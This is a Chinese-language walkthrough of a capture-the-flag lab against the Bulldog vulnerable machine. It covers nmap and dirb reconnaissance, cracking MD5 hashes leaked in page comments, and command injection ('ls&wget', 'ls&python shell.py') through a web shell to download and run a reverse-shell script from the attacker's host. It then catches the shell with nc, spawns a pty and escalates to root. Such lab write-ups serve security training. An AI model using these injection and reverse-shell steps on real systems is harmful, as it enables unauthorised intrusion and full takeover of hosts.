主要工具 kali Linux
打开bulldog,没有图形界面。。从开机过程可以发现是个Linux系统
打开kali终端,开始收集信息,nmap开始搞事
先扫全网段IP,爆出此靶机的IP地址
# nmap 192.168.111.0/24
发现只有192.168.111.136扫出了大量服务和对应端口,然后我们对这个疑似的地址进行细扫
# nmap -O -T4 -sV 192.168.111.136 果然出现了东西
开启了网络服务,还有ssh服务,Linux操作系统
我们先从ssh下手登录,但是要注意的是ssh服务默认端口是22哦
# ssh root@192.168.111.136 -p 23
呃太尴尬了,没有公钥进行连接,而且最主要的是咱也不知道密码,ssh先搁置,利用靶机的网络服务找找漏洞。浏览器先打开网站康康:
尝试看看能点的东西:
呃感觉啥也没得,利用dirb扫一下网站目录康康:
# dirb http://192.168.111.136
先打开admin
这是一个登录点,目前一切未知。。自然admin后的所有东西暂时都被挡住了
再看dev和dev/shell:
注意到了这句话web_shell服务需要有权限才能使用。而dev界面的邮箱?难道泄露了信息,开启开发工具模式看看源码,或许有发现?
在注释中好像隐藏了加密密码?MD5?电子邮件@前的极有可能是用户名。
拉出一个试试:sarah md5解密一下:
用户sarah 密码bulldoglover,此时去admin界面登录一下:
哦吼登上了,还是无权限的,这下试试刚才的dev/shell界面:
看起来有些命令在这个交互的web-shell界面是可以执行的。
既然是web-shell,我们在ls里找到了文件,我们可以在kali上写一个反弹shell的py脚本:
注意,要写到kali的网络服务下,因为一会儿要开启监听反弹shell
# cd /var/www/html
# vim shell.py
保存,建立一个socket连接,将对应网址与kali的1234端口连接,上传文件并试图打开终端;
开启kali的web服务
# /etc/init.d/apache2
开启python的网络服务
# python -m SimpleHTTPServer 80
失败,因为80被apache2占用,必须杀死此进程
# netstat -anptu | grep apache2
# kill 1507
python重新开始监听,web-shell开始下载刚才的py文件
ls&wget "http://192.168.111.135 shell.py"
最关键的一步,web-shell上执行py文件并让kali监听1234端口
web-shell上 ls&python shell.py
# nc -nvlp 1234
执行了,看nc对应的终端:
出现了$,shell反弹成功,很明显不是管理员高级权限。
$ cat /etc/passwd 寻找有用信息:
找到bulldogadmin用户,看看有什么信息:
有意思的是,ls啥也没有,但是# ls -al 查看出了隐藏的文件。 ./hiddenadmindirectory啧看看
查看文件
???SUPERultimatePASSWORDyouCANTget ??? 试试
$ su root
需要打开一个终端,我们可以用python打开一个本地伪终端:
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ sudo su -
看到了#,root也出来了提权成功
成了。
扫一扫
361
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
